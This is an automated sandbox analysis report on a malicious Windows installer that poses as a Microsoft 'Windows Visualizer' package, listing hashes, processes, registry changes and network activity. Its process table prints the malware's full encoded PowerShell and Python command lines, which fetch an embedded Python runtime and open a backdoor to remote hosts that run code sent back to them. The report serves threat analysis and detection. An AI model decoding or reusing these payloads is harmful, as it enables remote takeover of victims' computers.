| File name: | nf.msi |
| Full analysis: | https://app.any.run/tasks/80ead33e-4f45-47e8-84dd-f2aa6de5330b |
| Verdict: | Malicious activity |
| Analysis date: | November 22, 2023, 13:41:52 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-msi |
| File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Dec 11 11:47:44 2009, Security: 0, Code page: 1252, Revision Number: {69219A73-1EA2-4717-9E2C-3F94216A80F7}, Number of Words: 10, Subject: Windows Visualizer, Author: Microsoft Company., Name of Creating Application: Advanced Installer 16.1 build c9c5c0c9, Template: ;1033, Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200 |
| MD5: | 6A23AFBDEEB0D62A82585A6FEE6A3D71 |
| SHA1: | 4ABF5FE49A31C3208E3E07F1BF021486D8FECC97 |
| SHA256: | 22F159ACAEE38A5F6D16445B587B177493A0EAD73B6D0E58F6FE913DDBF1F258 |
| SSDEEP: | 49152:u2Kwz4uGN6Lgq3vJ8MKuZ+Z7gcmvk8deKZIVHP:Ewz4uN3vJ8MJx |
| .msi | | | Microsoft Windows Installer (88.6) |
|---|---|---|
| .mst | | | Windows SDK Setup Transform Script (10) |
| .msi | | | Microsoft Installer (100) |
| LastPrinted: | 2009:12:11 11:47:44 |
|---|---|
| CreateDate: | 2009:12:11 11:47:44 |
| ModifyDate: | 2009:12:11 11:47:44 |
| Security: | None |
| CodePage: | Windows Latin 1 (Western European) |
| RevisionNumber: | {69219A73-1EA2-4717-9E2C-3F94216A80F7} |
| Words: | 10 |
| Subject: | Windows Visualizer |
| Author: | Microsoft Company. |
| LastModifiedBy: | - |
| Software: | Advanced Installer 16.1 build c9c5c0c9 |
| Template: | ;1033 |
| Comments: | - |
| Title: | Installation Database |
| Keywords: | Installer, MSI, Database |
| Pages: | 200 |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 284 | "C:\Windows\Installer\MSIA7D4.tmp" /DontWait /HideWindow /dir "C:\Users\Public\" msiexec.exe /i install.msi /QN | C:\Windows\Installer\MSIA7D4.tmp | — | msiexec.exe | |||||||||||
User: admin Company: Caphyon LTD Integrity Level: MEDIUM Description: File that launches another file Exit code: 0 Version: 16.1.0.0 Modules
| |||||||||||||||
| 312 | -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\admin\AppData\Local\Temp\pssB147.ps1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | msiexec.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 1936 | "C:\Windows\System32\msiexec.exe" /i "C:\Users\admin\AppData\Local\Temp\nf.msi" | C:\Windows\System32\msiexec.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2092 | C:\Windows\syswow64\MsiExec.exe -Embedding CF6EF34E91A059715FC05E5E63911517 | C:\Windows\SysWOW64\msiexec.exe | msiexec.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2240 | "C:\Users\Public\python\python.exe" -c "import base64; exec(base64.b64decode('bSA9ICc4MzIzNTIwODc0NycKZnJvbSB0aW1lIGltcG9ydCBzbGVlcApzbGVlcCg2MCkKaW1wb3J0IGJhc2U2NCBhcyBiCmltcG9ydCBzb2NrZXQgYXMgc3MKZnJvbSByYW5kb20gaW1wb3J0IGNob2ljZQppbXBvcnQgd2lucmVnIGFzIHcKZGVmIHAoYywgbik6CiAgICBzMiA9IHcuT3BlbktleSh3LkhLRVlfTE9DQUxfTUFDSElORSwgYykKICAgIHJldHVybiB3LlF1ZXJ5VmFsdWVFeChzMiwgbilbMF0KcHIgPSBwKHInSEFSRFdBUkVcXERFU0NSSVBUSU9OXFxTeXN0ZW1cXENlbnRyYWxQcm9jZXNzb3JcXDAnLCAnUHJvY2Vzc29yTmFtZVN0cmluZycpCnZzID0gcChyJ1NPRlRXQVJFXFxNaWNyb3NvZnRcXFdpbmRvd3MgTlRcXEN1cnJlbnRWZXJzaW9uJywgJ1Byb2R1Y3ROYW1lJykKZnMgPSAnLmJyYXppbHNvdXRoLmNsb3VkYXBwLmF6dXJlLmNvbScKbGwgPSBbZidqZ2hza2Q5a2Z4N3tmc30nLCBmJ2tmNGZqOTJ6ZmtqOTJ7ZnN9JywgZidma2o5OTN5ZjM5MzN7ZnN9JywgZidnZzQ5OGpoaDJ4OTQzNHtmc30nLCBmJ2hoNTgzOTAwNGpoe2ZzfScsIGYnaWJzMTF4a2Q4OTQze2ZzfSddCmVlID0gRmFsc2UKd2hpbGUgVHJ1ZToKICAgIGlmICdCcm9hZHdlbGwnIGluIHByOgogICAgICAgIGJyZWFrCiAgICBmb3IgbCBpbiBsbDoKICAgICAgICB0cnk6CiAgICAgICAgICAgIHdpdGggc3Muc29ja2V0KHNzLkFGX0lORVQsIHNzLlNPQ0tfU1RSRUFNKSBhcyBzOgogICAgICAgICAgICAgICAgcy5jb25uZWN0KChmJ3tsfScsIGNob2ljZShbMzgyMSwgNDQxOCwgNTE3OCwgOTk4MywgNzMxMSwgODI5NCwgNjI3MywgMjExOSwgMTAxOCwgMTcwMV0pKSkKICAgICAgICAgICAgICAgIHMuc2VuZChmJ3B5Q29kZSAtIHtzcy5nZXRob3N0bmFtZSgpfSB8IHt2c30gfCB7cHJ9Jy5lbmNvZGUoKSkKICAgICAgICAgICAgICAgIGR0ID0gcy5yZWN2KDY1NTM2KS5kZWNvZGUoKQogICAgICAgICAgICAgICAgZXhlYyhiLmI2NGRlY29kZShzdHIoZHQpKSkKICAgICAgICAgICAgICAgIHMuY2xvc2UoKQogICAgICAgICAgICAgICAgZWUgPSBUcnVlCiAgICAgICAgICAgICAgICBicmVhawogICAgICAgIGV4Y2VwdDoKICAgICAgICAgICAgcGFzcwogICAgbGwuYXBwZW5kKCdjYW1lcmEtZW1wcmVzYS5hY2Nlc3NjYW0ub3JnJykKICAgIGlmIGVlOgogICAgICAgIGJyZWFr')); exit()" | C:\Users\Public\python\python.exe | — | powershell.exe | |||||||||||
User: admin Company: Python Software Foundation Integrity Level: MEDIUM Description: Python Exit code: 3221225781 Version: 3.9.6 Modules
| |||||||||||||||
| 2556 | C:\Windows\syswow64\MsiExec.exe -Embedding 0E1787F46149851503D7DD05A7A8A3DF | C:\Windows\SysWOW64\msiexec.exe | — | msiexec.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2724 | "C:\Windows\System32\msiexec.exe" /i install.msi /QN | C:\Windows\SysWOW64\msiexec.exe | — | MSIA7D4.tmp | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2784 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e CgAjACAAQgBsAG8AYwBrACAAZgBvAHIAIABkAGUAYwBsAGEAcgBpAG4AZwAgAHQAaABlACAAcwBjAHIAaQBwAHQAIABwAGEAcgBhAG0AZQB0AGUAcgBzAC4ACgBQAGEAcgBhAG0AKAApAAoACgBjAGQAIAAkAEUATgBWADoAcAB1AGIAbABpAGMACgAkAEYAbwBsAGQAZQByACAAPQAgACIAJAB7AEUATgBWADoAcAB1AGIAbABpAGMAfQBcAHAAZQBmAGkAbABlAC0AMgAwADIAMwAuADIALgA3ACIACgAkAEYAbwBsAGQAZQByADIAIAA9ACAAIgAkAHsARQBOAFYAOgBwAHUAYgBsAGkAYwB9AFwAcAB5AHQAaABvAG4AIgAKAGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABGAG8AbABkAGUAcgAyACAALQBQAGEAdABoAFQAeQBwAGUAIABDAG8AbgB0AGEAaQBuAGUAcgApACkAIAB7AAoAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAUgBJACAAaAB0AHQAcABzADoALwAvAGYAaQBsAGUAcwAuAHAAeQB0AGgAbwBuAGgAbwBzAHQAZQBkAC4AbwByAGcALwBwAGEAYwBrAGEAZwBlAHMALwA3ADgALwBjADUALwAzAGIAMwBjADYAMgAyADIAMwBmADcAMgBlADIAMwA2ADAANwAzADcAZgBkADIAYQA1ADcAYwAzADAAZQA1AGIAMgBhAGQAZQBjAGQAOAA1AGUANwAwADIANwA2ADgANwA5ADYAMAA5AGEANwA0ADAAMwAzADMANAAvAHAAZQBmAGkAbABlAC0AMgAwADIAMwAuADIALgA3AC4AdABhAHIALgBnAHoAIAAtAE8AdQB0AEYAaQBsAGUAIABwAGUAZgBpAGwAZQAuAHQAYQByAC4AZwB6AAoAIAAgACAAIAB0AGEAcgAgAC0AeAB2AHoAZgAgAHAAZQBmAGkAbABlAC4AdABhAHIALgBnAHoAOwAKACAAIAAgACAAUgBlAG4AYQBtAGUALQBJAHQAZQBtACAAJABGAG8AbABkAGUAcgAgACIAcAB5AHQAaABvAG4AIgAKACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAFIASQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAeQB0AGgAbwBuAC4AbwByAGcALwBmAHQAcAAvAHAAeQB0AGgAbwBuAC8AMwAuADkALgA2AC8AcAB5AHQAaABvAG4ALQAzAC4AOQAuADYALQBlAG0AYgBlAGQALQB3AGkAbgAzADIALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAHAAeQB0AGgAbwBuAC4AegBpAHAAOwAKACAAIAAgACAARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAcAB5AHQAaABvAG4ALgB6AGkAcAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIABwAHkAdABoAG8AbgA7AAoAfQAKAC4AXABwAHkAdABoAG8AbgBcAHAAeQB0AGgAbwBuAC4AZQB4AGUAIAAtAGMAIAAiACIAIgBpAG0AcABvAHIAdAAgAGIAYQBzAGUANgA0ADsAIABlAHgAZQBjACgAYgBhAHMAZQA2ADQALgBiADYANABkAGUAYwBvAGQAZQAoACcAYgBTAEEAOQBJAEMAYwA0AE0AegBJAHoATgBUAEkAdwBPAEQAYwAwAE4AeQBjAEsAWgBuAEoAdgBiAFMAQgAwAGEAVwAxAGwASQBHAGwAdABjAEcAOQB5AGQAQwBCAHoAYgBHAFYAbABjAEEAcAB6AGIARwBWAGwAYwBDAGcAMgBNAEMAawBLAGEAVwAxAHcAYgAzAEoAMABJAEcASgBoAGMAMgBVADIATgBDAEIAaABjAHkAQgBpAEMAbQBsAHQAYwBHADkAeQBkAEMAQgB6AGIAMgBOAHIAWgBYAFEAZwBZAFgATQBnAGMAMwBNAEsAWgBuAEoAdgBiAFMAQgB5AFkAVwA1AGsAYgAyADAAZwBhAFcAMQB3AGIAMwBKADAASQBHAE4AbwBiADIAbABqAFoAUQBwAHAAYgBYAEIAdgBjAG4AUQBnAGQAMgBsAHUAYwBtAFYAbgBJAEcARgB6AEkASABjAEsAWgBHAFYAbQBJAEgAQQBvAFkAeQB3AGcAYgBpAGsANgBDAGkAQQBnAEkAQwBCAHoATQBpAEEAOQBJAEgAYwB1AFQAMwBCAGwAYgBrAHQAbABlAFMAaAAzAEwAawBoAEwAUgBWAGwAZgBUAEUAOQBEAFEAVQB4AGYAVABVAEYARABTAEUAbABPAFIAUwB3AGcAWQB5AGsASwBJAEMAQQBnAEkASABKAGwAZABIAFYAeQBiAGkAQgAzAEwAbABGADEAWgBYAEoANQBWAG0ARgBzAGQAVwBWAEYAZQBDAGgAegBNAGkAdwBnAGIAaQBsAGIATQBGADAASwBjAEgASQBnAFAAUwBCAHcASwBIAEkAbgBTAEUARgBTAFIARgBkAEIAVQBrAFYAYwBYAEUAUgBGAFUAMABOAFMAUwBWAEIAVQBTAFUAOQBPAFgARgB4AFQAZQBYAE4AMABaAFcAMQBjAFgARQBOAGwAYgBuAFIAeQBZAFcAeABRAGMAbQA5AGoAWgBYAE4AegBiADMASgBjAFgARABBAG4ATABDAEEAbgBVAEgASgB2AFkAMgBWAHoAYwAyADkAeQBUAG0ARgB0AFoAVgBOADAAYwBtAGwAdQBaAHkAYwBwAEMAbgBaAHoASQBEADAAZwBjAEMAaAB5AEoAMQBOAFAAUgBsAFIAWABRAFYASgBGAFgARgB4AE4AYQBXAE4AeQBiADMATgB2AFoAbgBSAGMAWABGAGQAcABiAG0AUgB2AGQAMwBNAGcAVABsAFIAYwBYAEUATgAxAGMAbgBKAGwAYgBuAFIAVwBaAFgASgB6AGEAVwA5AHUASgB5AHcAZwBKADEAQgB5AGIAMgBSADEAWQAzAFIATwBZAFcAMQBsAEoAeQBrAEsAWgBuAE0AZwBQAFMAQQBuAEwAbQBKAHkAWQBYAHAAcABiAEgATgB2AGQAWABSAG8ATABtAE4AcwBiADMAVgBrAFkAWABCAHcATABtAEYANgBkAFgASgBsAEwAbQBOAHYAYgBTAGMASwBiAEcAdwBnAFAAUwBCAGIAWgBpAGQAcQBaADIAaAB6AGEAMgBRADUAYQAyAFoANABOADMAdABtAGMAMwAwAG4ATABDAEIAbQBKADIAdABtAE4ARwBaAHEATwBUAEoANgBaAG0AdABxAE8AVABKADcAWgBuAE4AOQBKAHkAdwBnAFoAaQBkAG0AYQAyAG8ANQBPAFQATgA1AFoAagBNADUATQB6AE4ANwBaAG4ATgA5AEoAeQB3AGcAWgBpAGQAbgBaAHoAUQA1AE8ARwBwAG8AYQBEAEoANABPAFQAUQB6AE4ASAB0AG0AYwAzADAAbgBMAEMAQgBtAEoAMgBoAG8ATgBUAGcAegBPAFQAQQB3AE4ARwBwAG8AZQAyAFoAegBmAFMAYwBzAEkARwBZAG4AYQBXAEoAegBNAFQARgA0AGEAMgBRADQATwBUAFEAegBlADIAWgB6AGYAUwBkAGQAQwBtAFYAbABJAEQAMABnAFIAbQBGAHMAYwAyAFUASwBkADIAaABwAGIARwBVAGcAVgBIAEoAMQBaAFQAbwBLAEkAQwBBAGcASQBHAGwAbQBJAEMAZABDAGMAbQA5AGgAWgBIAGQAbABiAEcAdwBuAEkARwBsAHUASQBIAEIAeQBPAGcAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEcASgB5AFoAVwBGAHIAQwBpAEEAZwBJAEMAQgBtAGIAMwBJAGcAYgBDAEIAcABiAGkAQgBzAGIARABvAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBCADAAYwBuAGsANgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkASABkAHAAZABHAGcAZwBjADMATQB1AGMAMgA5AGoAYQAyAFYAMABLAEgATgB6AEwAawBGAEcAWAAwAGwATwBSAFYAUQBzAEkASABOAHoATABsAE4AUABRADAAdABmAFUAMQBSAFMAUgBVAEYATgBLAFMAQgBoAGMAeQBCAHoATwBnAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAYwB5ADUAagBiADIANQB1AFoAVwBOADAASwBDAGgAbQBKADMAdABzAGYAUwBjAHMASQBHAE4AbwBiADIAbABqAFoAUwBoAGIATQB6AGcAeQBNAFMAdwBnAE4ARABRAHgATwBDAHcAZwBOAFQARQAzAE8AQwB3AGcATwBUAGsANABNAHkAdwBnAE4AegBNAHgATQBTAHcAZwBPAEQASQA1AE4AQwB3AGcATgBqAEkAMwBNAHkAdwBnAE0AagBFAHgATwBTAHcAZwBNAFQAQQB4AE8AQwB3AGcATQBUAGMAdwBNAFYAMABwAEsAUwBrAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkASABNAHUAYwAyAFYAdQBaAEMAaABtAEoAMwBCADUAUQAyADkAawBaAFMAQQB0AEkASAB0AHoAYwB5ADUAbgBaAFgAUgBvAGIAMwBOADAAYgBtAEYAdABaAFMAZwBwAGYAUwBCADgASQBIAHQAMgBjADMAMABnAGYAQwBCADcAYwBIAEoAOQBKAHkANQBsAGIAbQBOAHYAWgBHAFUAbwBLAFMAawBLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEcAUgAwAEkARAAwAGcAYwB5ADUAeQBaAFcATgAyAEsARABZADEATgBUAE0AMgBLAFMANQBrAFoAVwBOAHYAWgBHAFUAbwBLAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBaAFgAaABsAFkAeQBoAGkATABtAEkAMgBOAEcAUgBsAFkAMgA5AGsAWgBTAGgAegBkAEgASQBvAFoASABRAHAASwBTAGsASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBIAE0AdQBZADIAeAB2AGMAMgBVAG8ASwBRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAWgBXAFUAZwBQAFMAQgBVAGMAbgBWAGwAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAGkAYwBtAFYAaABhAHcAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEcAVgA0AFkAMgBWAHcAZABEAG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAGMARwBGAHoAYwB3AG8AZwBJAEMAQQBnAGIARwB3AHUAWQBYAEIAdwBaAFcANQBrAEsAQwBkAGoAWQBXADEAbABjAG0ARQB0AFoAVwAxAHcAYwBtAFYAegBZAFMANQBoAFkAMgBOAGwAYwAzAE4AagBZAFcAMAB1AGIAMwBKAG4ASgB5AGsASwBJAEMAQQBnAEkARwBsAG0ASQBHAFYAbABPAGcAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEcASgB5AFoAVwBGAHIAJwApACkAOwAgAGUAeABpAHQAKAApACIAIgAiADsACgA= | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 3020 | C:\Windows\system32\msiexec.exe /V | C:\Windows\System32\msiexec.exe | — | services.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Windows® installer Exit code: 0 Version: 5.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (2092) msiexec.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
| Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
| (PID) Process: | (2092) msiexec.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
| Operation: | write | Name: | SavedLegacySettings |
Value: 46000000C1000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
| (PID) Process: | (2092) msiexec.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2092) msiexec.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2092) msiexec.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2092) msiexec.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (2092) msiexec.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (2092) msiexec.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (284) MSIA7D4.tmp | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (284) MSIA7D4.tmp | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3020 | msiexec.exe | C:\Windows\Installer\MSIA7D4.tmp | executable | |
MD5:313E5ADBA81569C13D5BE24139CB2A02 | SHA256:D54BB7C088002A467A7D37ECC1AE1AA9BDE920078DC24D5844D8AC7A57EA5841 | |||
| 3020 | msiexec.exe | C:\Windows\Installer\MSIA824.tmp | executable | |
MD5:9E6B90CA4C776937943C976A56A18701 | SHA256:CBAD1F9097A0EE0874F8F29D206A9DF465A96A53806E27E2E5A2BC9782BECA38 | |||
| 3020 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DF8A203C9BF9977BFB.TMP | binary | |
MD5:46C29E370E713DEED5DDB82B75DB1760 | SHA256:EDC342E1D544A4F71FCACD9B42CFE6C066CD95E120FB6BDEEFC295A4A75454EB | |||
| 2092 | msiexec.exe | C:\Users\Public\install.msi | executable | |
MD5:6BEDE1BA2D91C41AC34F0497731AD595 | SHA256:BE3E9077FEBAE2147C126687E930EA5B517BECD5435226E5CD10209D8B6BA0A3 | |||
| 3020 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\~DFD730EB0A516862A2.TMP | binary | |
MD5:BF619EAC0CDF3F68D496EA9344137E8B | SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 | |||
| 3020 | msiexec.exe | C:\Windows\Installer\MSIA6E6.tmp | executable | |
MD5:CA95F207EC70BA34B46C785F7BCB5570 | SHA256:8AC4B42FB36D10194A14C32F6F499A6AC6ACB79ADBEC858647495BA64F6DD2BB | |||
| 2556 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\msiB145.txt | — | |
MD5:— | SHA256:— | |||
| 2556 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\pssB146.ps1 | — | |
MD5:— | SHA256:— | |||
| 3020 | msiexec.exe | C:\Windows\Installer\MSIA706.tmp | executable | |
MD5:CA95F207EC70BA34B46C785F7BCB5570 | SHA256:8AC4B42FB36D10194A14C32F6F499A6AC6ACB79ADBEC858647495BA64F6DD2BB | |||
| 2556 | msiexec.exe | C:\Users\admin\AppData\Local\Temp\pssB147.ps1 | — | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2784 | powershell.exe | GET | 200 | 104.18.21.226:80 | http://secure.globalsign.com/cacert/root-r3.crt | unknown | binary | 867 b | unknown |
2784 | powershell.exe | GET | 200 | 46.228.146.128:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?fc5741d102329b66 | unknown | compressed | 61.6 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
324 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2092 | msiexec.exe | 23.212.211.183:443 | bixolabs10.autodesk360.com | AKAMAI-AS | AU | unknown |
1956 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
2092 | msiexec.exe | 18.66.97.125:443 | cdn.us.oss.api.autodesk.com | — | US | unknown |
2784 | powershell.exe | 151.101.1.55:443 | files.pythonhosted.org | FASTLY | US | unknown |
2784 | powershell.exe | 146.75.120.223:443 | www.python.org | FASTLY | US | unknown |
2784 | powershell.exe | 104.18.21.226:80 | secure.globalsign.com | CLOUDFLARENET | — | shared |
2784 | powershell.exe | 46.228.146.128:80 | ctldl.windowsupdate.com | LLNW | US | unknown |
Domain | IP | Reputation |
|---|---|---|
bixolabs10.autodesk360.com |
| unknown |
cdn.us.oss.api.autodesk.com |
| unknown |
files.pythonhosted.org |
| unknown |
www.python.org |
| whitelisted |
secure.globalsign.com |
| whitelisted |
ctldl.windowsupdate.com |
| whitelisted |
PID | Process | Class | Message |
|---|---|---|---|
324 | svchost.exe | Misc activity | ET INFO File Hosting Service Domain Domain in DNS Lookup (files .pythonhosted .org) |
2784 | powershell.exe | Misc activity | ET INFO Observed File Hosting Service Domain (files .pythonhosted .org in TLS SNI) |